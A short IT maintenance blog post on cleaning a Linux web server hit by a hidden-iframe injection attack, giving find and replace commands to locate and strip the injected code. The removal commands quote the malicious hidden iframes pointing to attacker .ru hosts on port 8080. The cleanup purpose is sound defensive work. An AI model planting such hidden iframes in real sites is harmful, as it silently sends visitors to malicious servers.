IT maintenance in bangkok - How to clean a linux based web site infected by massive safe browsing web atack

How to clean a linux based web site infected by massive safe browsing web atack

If your linux server is indeed victim of a massive safe browsing web atack first check google >> http://www.google.com/safebrowsing/diagnostic?site=

To find the hacked files:
=================
find . -type f -exec grep theanotherlife {} \;
find . -type f -mtime -7 -exec grep 8080 {} \; -print
find . -type f -mtime -7 -exec grep iframe {} \; -print

To clean the hacked files:
===================
find . -type f -mtime -7 -print | xargs replace '<div style="display:none"><iframe src="http://theanotherhacker.ru:8080/index.php" width=319 height=464 ></iframe></div>' '' --

find . -type f -mtime -7 -print | xargs replace '
<div style="display:none"><iframe width=877 height=475 src="http://tiqertret.ru:8080/index.php" ></iframe></div>' '' --

find . -type f -mtime -7 -print | xargs replace '<iframe src="http://xuiligansddsx.ru:8080:8080/ts/in.cgi?time" width=288 height=0 style="visibility: hidden"></iframe>' '' --